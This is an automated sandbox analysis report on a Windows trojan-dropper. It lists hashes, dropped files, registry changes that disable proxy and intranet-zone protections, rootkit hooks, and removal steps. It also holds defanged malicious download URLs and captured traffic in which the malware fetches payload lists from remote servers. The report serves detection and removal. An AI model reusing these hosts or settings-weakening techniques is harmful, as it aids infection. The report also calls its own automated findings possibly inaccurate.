Trojan-Dropper.Win32.Flystud.d (Kaspersky), Gen:Variant.Graftor.104958 (B) (Emsisoft), Gen:Variant.Graftor.104958 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 1029a3693577a20f33abe5e8b6dae06f
SHA1: f136cccde3e38a4629a5487bb9489be5189fb22d
SHA256: 2e35362b419de4f52e1ee9ff9f863810e62ec540ea7026adc55e046c2cebbc38
SSDeep: 49152:Av4hcI6DRlQRAt8Rxhwp3ijLsTQpsvD/DX y4onCYDoD5:2I79wp4yOsvD/D donCYUV
Size: 2070410 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: TODO:
Created at: 2000-05-19 13:11:55
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1612
bv.exe:464
7048ico.exe:1096
comdhost.exe:424
The Trojan injects its code into the following process(es):
300084.exe:256
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)
The process bv.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\byteFirewall.dat (253 bytes)
The process 7048ico.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\2015040604\userconfig.ini (22 bytes)
%WinDir%\2015040604\config.ini (22 bytes)
%WinDir%\2015040604\svchost.exe (2105 bytes)
%System%\filelog.dat (24 bytes)
The process comdhost.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (0 bytes)
Registry activity
The process %original file name%.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 0E B0 DC C8 12 71 5E 22 5F DE A4 C4 DB 6E 18"
The process bv.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 7A E7 B2 35 A7 1B F5 B9 E2 38 71 F4 CE 77 8E"
The process 7048ico.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 FC 3D 27 FF 85 4F 32 EA 27 29 91 3B 95 74 79"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\2015040604]
"svchost.exe" = "2015"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process comdhost.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 34 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 CF 63 BA 05 25 F3 2A A9 71 B2 1B 40 3E 92 F7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 97c8fe752e354b2945e4c593a87e4a8b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\krnln.fnr |
| d63851f89c7ad4615565ca300e8b8e27 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\shell.fne |
| 11696f334778bda9231aa6b72bbcdaf7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_N4\krnln.fnr |
| bfa0b913e4067706b8f2746d51caac44 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bv.exe |
| 3ed32c6b3a6794a7ee6223aef4670b5d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\smss.exe |
| cf0611524894bb6d0a64a8e157846efd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe |
| 4de3914c7921c9d382d5d73ffc5f55cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\msvcr32.dll |
| 1ddf4cc1188804e8670e9ca6139c2fed | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\szicoad[1].exe |
| 103909a23b5ac9774471b315d373fc06 | c:\WINDOWS\2015040604\TCP-2015040604.dll |
| 1ddf4cc1188804e8670e9ca6139c2fed | c:\WINDOWS\2015040604\svchost.exe |
| 14e87fff8fa466a7b829c65cc12fb35f | c:\WINDOWS\system\7048ico.exe |
| 33579f370aeb1237a9282b51eacb6d34 | c:\WINDOWS\system\svchost.exe |
| fa682e642f66964cfddaa86b938d6694 | c:\byteFirewall.dat |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\??\C:\byteFirewall.dat" the Trojan substitutes IRP handlers to control devices of tcpip.sys driver:
MJ_CREATE
MJ_CREATE_NAMED_PIPE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_QUERY_INFORMATION
MJ_SET_INFORMATION
MJ_QUERY_EA
MJ_SET_EA
MJ_FLUSH_BUFFERS
MJ_QUERY_VOLUME_INFORMATION
MJ_SET_VOLUME_INFORMATION
MJ_DIRECTORY_CONTROL
MJ_FILE_SYSTEM_CONTROL
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL
MJ_SHUTDOWN
MJ_LOCK_CONTROL
MJ_CLEANUP
MJ_CREATE_MAILSLOT
MJ_QUERY_SECURITY
MJ_SET_SECURITY
MJ_POWER
MJ_SYSTEM_CONTROL
MJ_DEVICE_CHANGE
MJ_QUERY_QUOTA
MJ_SET_QUOTA
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1612
bv.exe:464
7048ico.exe:1096
comdhost.exe:424 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)
C:\byteFirewall.dat (253 bytes)
%WinDir%\2015040604\userconfig.ini (22 bytes)
%WinDir%\2015040604\config.ini (22 bytes)
%WinDir%\2015040604\svchost.exe (2105 bytes)
%System%\filelog.dat (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 19868 | 20480 | 4.51528 | 15c1f09b5a84212473d3312136f61984 |
| .rdata | 24576 | 2634 | 4096 | 2.46987 | c3a429c9401d144a06bbf6c66f26e739 |
| .data | 28672 | 8024 | 8192 | 1.98312 | 391dfe9979de8fe0fe40df3f14303242 |
| .ecode | 36864 | 4096 | 4096 | 3.11561 | dd0555631ceaf30c86b63ebb73afd81f |
| .rsrc | 40960 | 928 | 4096 | 1.08643 | 654c64e0942f056dece224a875c0f5c8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ipaddress.wb916.com/IP.aspx | 180.97.81.86 |
| hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
| hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
| hxxp://oss-cn-beijing-sandbox-2.ossuser.aliyuncs.com/server/server.txt | |
| hxxp://cdct.zhdns.net/proj/BackEnd.ini | |
| hxxp://cdct.zhdns.net/m137390001.xml | |
| hxxp://ddkj04.oss-cn-hangzhou.aliyuncs.com/updata/adclient/client/szicoad.exe | |
| hxxp://cdct.zhdns.net/proj/BackEnd32.zip | |
| hxxp://cdct.zhdns.net/config.xml | |
| hxxp://cdct.zhdns.net/proj/MainCtrl.xml | |
| hxxp://pubyun.s.3322.net/dyndns/getip | |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 87.245.221.113 |
| hxxp://domain.awangba.com.cn/proj/MainCtrl.xml | 58.218.211.249 |
| hxxp://domain.awangba.com.cn/proj/BackEnd.ini | 58.218.211.249 |
| hxxp://down04.kuaibu8.com/updata/adclient/client/szicoad.exe | 112.124.219.90 |
| hxxp://www.3322.org/dyndns/getip | 118.184.176.15 |
| hxxp://down.awangba.com.cn/proj/BackEnd32.zip | 122.226.181.115 |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | 87.245.221.113 |
| hxxp://user.awangba.com.cn/m137390001.xml | 122.226.102.76 |
| hxxp://domain.awangba.com.cn/config.xml | 58.218.211.249 |
| hxxp://gengxin.kuaibu8.com/server/server.txt | 182.92.18.11 |
| tongji.wangbax.cn | 115.28.38.37 |
| www.kuaibu8.com | 180.97.81.86 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=10437
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
1401D04D49E16F8687....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:36:45 GMT
Accept-Ranges: bytes
ETag: "804c50f7c94fd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49859
Cache-Control: max-age=10786
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
MSCF............,...................I.......#.........WFw. .authroot.stl.....08..CK...<.......m..dK.......D.d'....fW...RJe.).."...n.Ie.,E.RH...L....\...z.^...p.<g.9...~...=.d/.. ...H....8f|&x.N.d..p(....(....g.@ga0..4...E(.p`d. .....D.....g%.j..w.DF..GW .....*.@6....#.8....v..=T..^.G.G.!.A........_...r..3n...G.g\_.r.....Au..sw.3.....G.f. ..0..0.^.R".K|.....y...l..1.......t.(...0Y......4.,......x..ENY.`d..O.....!..9A~....^...H.2.-.jK.r.....m.q.....5.@.r...@....A.B.....e...x.).|.H...A.[.Q. D`.}YQvx.B`b.=....,X...-.5S..N..=x.....C.Mj^.H....5b...5........I...`..... ..l.n.:.....j...u2gA.hx.`%K.bw...\!o.........R....=..*...w..J....q.?^.PuA..W...>.._..O......9|.../......m.E.u.d...J2.U.e?....}h.S.zC^...<.c)...^c.b}.2..'X567.!.h. ......5.......S*.z%..%..e...R...C#p..k.[...3...jI.<.Z.GX.u.- ....ut{.&>...:.......f...f.)y.....5.../R.b.......r.!.4.-a.....!...P......Q'7.0.%[.~m_..v....;..:.X..~...,.......O....u|T.L....w....)5.bBs..W..r..u.......W......'G......y...h.. %. z?..............f.Nx./c...R...`..y.>....'......l=.O..#......... ..P..Q.......3.............M......%...v.:(...u..zU......G_.<ue...F.....6Xo......P.......@L#........4<....K.g:...3o.N..:..zb...5..,.5...C... .4..`Q0.....$9./.$1....WL)$.0F......^..k..D.*.#.L3. (}.,,.kd.<W.....[,.....Y.n.b.....4.Y)...c.g..`.y.........X..I? '.{Cb.GDh.d..F..2B...sT.^..!.L..}.P....C...?.......~.....d....5.j...1.y9^_K..g..pX.......^z.e)....yc......?..o...e......KJ..H.O..m......B27....?.~m ..xt...c...@b..S.......a(....f1...h.0.u4..(.........2b`....]..H.Ja..
<<< skipped >>>
GET /config.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 617
Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 08:32:08 GMT
ETag: "54bf5c75-269"
Age: 62667
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<Config>.. <UpUrl>.. <MainPageID></MainPageID>.. <ycgg>*.059jxw.com@*.777tttkkk.com@*.changduanxue.com@*.jia665511.com@*.okok77889.com</ycgg>.. </UpUrl>...<BlackUrl>about:Tabs@about:blank@file:*@*.shunwang.com*@*.google.com*@*.baidu.com*@*.gov.cn@*.58qh.com@111.113.6.21@*.yxeram.org@*.yxera.org@*.yxera.net@192.168.*@*gonggao.icafe8.net*@*xd.xoyo.com*</BlackUrl>...<OutGameUrl>hXXp://tz.awangba.com.cn/uimg1.htm@hXXp://VVV.baidu.com@hXXp://VVV.sina.com@hXXp://VVV.163.com</OutGameUrl>...<TestUser>*</TestUser>...<MainPageWhite></MainPageWhite>..</Config>..HTTP/1.0 200 OK..Content-Type: text/xml; charset=utf-8..Content-Length: 617..Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT..Accept-Ranges: bytes..Server: nginx..Date: Sun, 05 Apr 2015 08:32:08 GMT..ETag: "54bf5c75-269"..Age: 62667..X-Cache: HIT from ctjsxzs1..Via: 1.0 ctjsxzs1 (squid)..Connection: keep-alive..<?xml version="1.0" encoding="UTF-8"?>..<Config>.. <UpUrl>.. <MainPageID></MainPageID>.. <ycgg>*.059jxw.com@*.777tttkkk.com@*.changduanxue.com@*.jia665511.com@*.okok77889.com</ycgg>.. </UpUrl>...<BlackUrl>about:Tabs@about:blank@file:*@*.shunwang.com*@*.google.com*@*.baidu.com*@*.gov.cn@*.58qh.com@111.113.6.21@*.yxeram.org@*.yxera.org@*.yxera.net@192.168.*@*gonggao.icafe8.net*@*xd.xoyo.com*</BlackUrl>...<OutGameUrl>htt
<<< skipped >>>
GET /proj/MainCtrl.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 4337
Last-Modified: Fri, 03 Apr 2015 03:12:39 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 05:05:29 GMT
ETag: "551e0527-10f1"
Age: 75067
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<FileDown>...<item name="common" type="Common">....<sys type="all">.....<file>common.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/common.zip</down>.....<md5>116C3295FF8726952963A5774637B309</md5>.....<param>appboot.exe</param>....</sys>...</item>......<item name="new" type="SGTS">....<sys type="x86">.....<file>sgts.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/sgts.zip</down>.....<md5>FC538737F7D79ACB274CE860194614A3</md5>.....<param>sgts.exe</param>....</sys>...</item>...<item name="gda" type="GDA">....<sys type="x86">.....<file>PtsGPU32.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/PtsGPU32.zip</down>.....<md5>6556006F549C0AE154AE60694D5242E2</md5>.....<param>PtsGPU.exe</param>....</sys>....<sys 